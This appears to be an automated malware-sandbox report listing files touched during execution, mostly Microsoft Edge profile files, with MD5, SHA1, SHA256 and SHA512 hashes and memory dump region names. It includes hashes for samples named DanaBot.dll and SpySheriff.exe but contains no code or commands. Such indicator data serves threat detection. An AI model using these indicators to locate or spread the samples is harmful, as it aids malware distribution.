MD5 48d8f7bbb500af66baa765279ce58045
SHA1 2cdb5fdeee4e9c7bd2e5f744150521963487eb71
SHA256 db0d72bc7d10209f7fa354ec100d57abbb9fe2e57ce72789f5f88257c5d3ebd1
SHA512 aef8aa8e0d16aab35b5cc19487e53583691e4471064bc556a2ee13e94a0546b54a33995739f0fa3c4de6ff4c6abf02014aef3efb0d93ca6847bad2220c3302bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\863b841d-5c10-44d3-99ed-2b9af6f19ec0\index-dir\the-real-index

MD5 a8e6c2a6a0bdae41abd0d163398ff3b6
SHA1 0d957d2be61f3824b4e0002d3d03d4088fc33298
SHA256 be6d6198730b2642d065c57e99336c13794624a255b509608636a6eca9986599
SHA512 2ea90aa412f0c49573fb03eae91fe0b01181df6bed0118058fdf826f18bf0c23bf0b19dbddbc13acb07bf1c9a68a1292dc930ee2413f38f2e1fe0a985934d1be

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

MD5 ebe7fe285f1dd5d2c8b6d33e9b46a1c1
SHA1 2d61d21d305e5da86e5efac6350c03a123625fb6
SHA256 b5c4ebdc747fba9c8c6a0c2282bae47eb40b7a485ceb3c24956788d31597eb64
SHA512 5b996359547ea7a6602481162540f56ca7cc98086f8198979585ae00ce3900a2426a3c29676d04e20baf116d1f4bb3e252d85ac986fee8a57aa941fc0aaf2e45

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 d81dc824b89d0f501e29061598284d29
SHA1 31e504d4bba10bdad8cc97c877016dd00582c804
SHA256 31c23b44f5046ab8b2643b00a3d8ff7588fedb5a853da56282b640a7c07c12c1
SHA512 5c9beec15e1c042eca196bec849e634d1132c330164c5ed28d887506ba6cdae80afe771149f3a0448f3d392909867ce3702480eaa6beba85dce039fb0adafe20

C:\Users\Admin\Downloads\DanaBot.dll

MD5 7e76f7a5c55a5bc5f5e2d7a9e886782b
SHA1 fc500153dba682e53776bef53123086f00c0e041
SHA256 abd75572f897cdda88cec22922d15b509ee8c840fa5894b0aecbef6de23908a3
SHA512 0318e0040f4dbf954f27fb10a69bce2248e785a31d855615a1eaf303a772ad51d47906a113605d7bfd3c2b2265bf83c61538f78b071f85ee3c4948f5cde3fb24

memory/4812-1706-0x00000000022D0000-0x000000000253B000-memory.dmp

memory/5524-1723-0x0000000002850000-0x0000000002ABB000-memory.dmp

memory/2748-1726-0x0000000002100000-0x000000000236B000-memory.dmp

memory/1324-1727-0x0000000000400000-0x0000000000AAD000-memory.dmp

memory/5768-1728-0x0000000000400000-0x0000000000AAD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 83f12cd0f590658af49a07f6aab8c5d2
SHA1 71a9e252259f5ba79dcadd06e6f77f0bb4065faa
SHA256 0ca62c516ddddc4bb25acc3031efd80853e1cee96aa30c268ca6366fefd824d0
SHA512 22255ed211d3b272f57704b2f10f152a458bc065c8ee469d9b977e5d11de972fe2c68f06d134f6971b4f0801b56afca771af7bf59d9ade2d49c1d631ff0136f9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5c77f65888afe6d631778cefd95a9a41
SHA1 b3ff5bc7528b1ab4af9a9d337da3e412cff53923
SHA256 8142ec00e48057ef3e20468a14e75349e0a1a32bf1bc8a4510bbf5236fe5b4e1
SHA512 10885f53f9c3500b508d2ba4df79dfe2201071a1111c71cea844be65a9b7cfcc7e0c98968465159d7540a5eac13901719a4280c07c7b908b872a716fe5ee7a7d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

MD5 3bca8411b45106afaa963d562c371631
SHA1 78857d33a65e7061ca18a3540c304f01e7e85325
SHA256 4503345ee70aa9ca0f90012b665743d7c13ec7052e7a943222287973b752b9c7
SHA512 a6a7e9af6613a30730a0b87be76f87144a3483afb756445d462de7b22543027e5e8f5822e0337ba2d7b65e413e526da962783d05d226c0d13d113d57d28b56ff

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig~RFe58435d.TMP

MD5 22ed3cc04fcc2e66b81335c4395971fd
SHA1 12ef48d70ec6f360644d2573dde99756f6ac05fb
SHA256 27bffcff6642dfcb87ac33eea61059552bc35ccd3c0d9f4da550398351836df9
SHA512 9219928d246a8aa761ee289b0baacc7214b028976b1b890c7f1df38ecac61cb3a90e8af1b3861929155d07af304d58ae8f7304466769669a7cd40c55ae61cf40

memory/4184-1785-0x0000000000400000-0x0000000000AAD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 84c60ede10b92218eb715af214f2d336
SHA1 c4bda62ada9f29dd38e38c615fffc2dde4ba7287
SHA256 f05d8562c71aa0caf758bf60f7453213eba2ab3d87aafbe11b4e7efeb3100f7b
SHA512 64326adaf1a4a904840807f40d33e46dad815522f0e88f3bd5ca31f6cb35b87f6927c050c7ec25c1fe1dfe71da036bb195c015e5e0a9b040e24782f697fff5ea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog~RFe5843ea.TMP

MD5 053fcd7b7eeffc66d85205926d5b35e1
SHA1 63d10e2d8e9f7693d8244b458e78be5061abe5aa
SHA256 f5e045b791b276b030597ffe069ef75e3968267584f3c94853aa3a21cc5150c2
SHA512 69a08dedaf4e1cb998a32fe4dd1a5818f43ed5a666e9c342c7dffb2ec94b7f5d400851b647bdf4297d4d48a4fc33679168ffda6b0a09af7ad6514228c46cdd0b

memory/5524-1809-0x0000000002850000-0x0000000002ABB000-memory.dmp

memory/2748-1810-0x0000000002100000-0x000000000236B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 52ad489a9df9a6992472b9dc93dc0bbf
SHA1 cf619e5fac29004ad31894a2768e9a5d79a1bfdd
SHA256 a7cdcf9de105c4bc84d0a77242f38240195fe87fa5522168523407afbe800ed0
SHA512 6323de92a6a94538e5f48eacab8d77e8310b5e956a5b448dcad6c412eddea6c3321a98866539ab6ca9a37772702637de2e24148eb14ae3184e0030a49fdcb98a

memory/5144-1811-0x0000000000400000-0x0000000000AAD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 d3069d59486de0b93bad6134e48a9f77
SHA1 640791c7a7c52d9c4420be7401b6251ba338efbc
SHA256 a5da0107e0f747d3aac2dcd0d0cf53ee6f61a3ff4b5eb1ebbc47fe96b25a606e
SHA512 3d7c12d165fd609c33e5a731e8dd07ec60becc0ffac441bb70d9d454b5833951bc831720d84c86cfb76f59d8eadb71b2849f4d0f16b7dcbd5be4930c3beb6028

C:\Users\Admin\Downloads\SpySheriff.exe

MD5 ab3e43a60f47a98962d50f2da0507df7
SHA1 4177228a54c15ac42855e87854d4cd9a1722fe39
SHA256 4f5f0d9a2b6ef077402a17136ff066dda4c8175ceb6086877aaa3570cabb638f
SHA512 9e3365c7860c4766091183d633462f1cc8c30d28871ae2cd8a9a086ce61c0bccf457f919db6826b708f0cf4f88e90f71185420edc4756b7d70137e2096f8797f

memory/5452-1848-0x0000000000400000-0x000000000040E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2c0a33808d7f6b8a0aee903434f14e74
SHA1 983f7156d76b8408e9ef673ef5fbc241c6ae947a
SHA256 2ac6d78e00d5a5dc42d25ef38f61c8319eb7e65dac4997ec0dd10b34f6035baa
SHA512 d206e53e1533f9bc77515835b55e21863f0f1cdf0cd947568d00b7fada5353ac698cb4db3c1240addb6f6fff081ce6f351df182b8c1f611b8e6faa84f2fd7ab3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 63443cddd56d14e4a9add94f02f71a35
SHA1 2e1f44753adbdb5640545aac10856c68261d8b74
SHA256 8850876679814d9a09e8d68a026c1dc853f3a8f2ecff40bb0c3b0d623ba5c027
SHA512 e2eb2123da79cac55c9a134d3e56c59a7b91640eb574b21cc8a97923cf190652366d97d49d7eba68acf3f9a0bff05888c98503959956ec7bb5991c0d5faabf38

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\6636b894-dc4c-4772-885b-cc2f1a909f33\index-dir\the-real-index

MD5 ba5c19f1f61eed66835c297326e73b47
SHA1 fcdcb609529f7f2c1341ad956e3c683daddc64b6
SHA256 148abe60fd2cc21dd524160373b8fae507103cc6781d65c86504be5a3d1c78a4
SHA512 fd1de6a3d414a6fbb603db20c4d7d35efbef71a0c476b737d5f2e070ad710cd7d271a912172af5ad4a04c2ac4d90004a771a38baec02798e51b2d36979020e17

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\6636b894-dc4c-4772-885b-cc2f1a909f33\index-dir\the-real-index

MD5 ae30fff8609e838a5c4671a37b0ee02a
SHA1 058d553b42150944f2409e07a0c299fdc6e52f72
SHA256 a235d12617e2246aa665c7e9b392b2e7480573ad47a7ecc5260ac5e882d93bc8
SHA512 cbefe293cfbe9b74d9f4e424b51429ef6d9147862406d846cf6a0e8bffd418707626ac5a2013490c46d0d7cc7b995b8c718b019decde66940c468f1907375424

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe586bb5.TMP

MD5 173bae6cf88ef8714ca84c5ce030e118
SHA1 76f8f6369fa7b9711aa4ab1ebbe229a700985a18
SHA256 862bafe0d4b7b8dc7665fddb93ab80018bbf80a28eacf64e0157d43c1022e82a
SHA512 19aae98f11b978c320248d5a18103ab124ca5a3fca35ebebd074385f0f07f1c77741b15812088719ac66e036e78fe2d375a91f8c713e17720424d653e3910c26

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

MD5 eb1ff79a09546614fecb655505356bb0
SHA1 cd8bedb6f6ff2f4a7e6e8b9c6cae51d0fe8b81f3
SHA256 96e1c3efce5683385141cd577522fd8616c0cc7bf21b52f21cc0182b2edb44b6
SHA512 f2645a2bbec51fbd04ed6773e4332bb5862b90564e2758863049cc3af3be7098208e3d11c6c48df5af89c512feab6401f8d30ff8317b8004f5724c88638451bb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 742dadea01efc27eb1c29256cecbf4bf
SHA1 5b651618a7fd491620d6780327c8afcacc6c1986
SHA256 e578b162a7f023f7c22d446a2e6b5e2a243cf5bff4fae03b107c67924e0f3a4f
SHA512 aa382e0f0491ad7749978bcf3aa8ee5f68474a5fa5566559c3ca00187a6e5a4ff9a028c33824256ec65d8d53d484864d434047fdb805d18a35de630c19a3e6a2
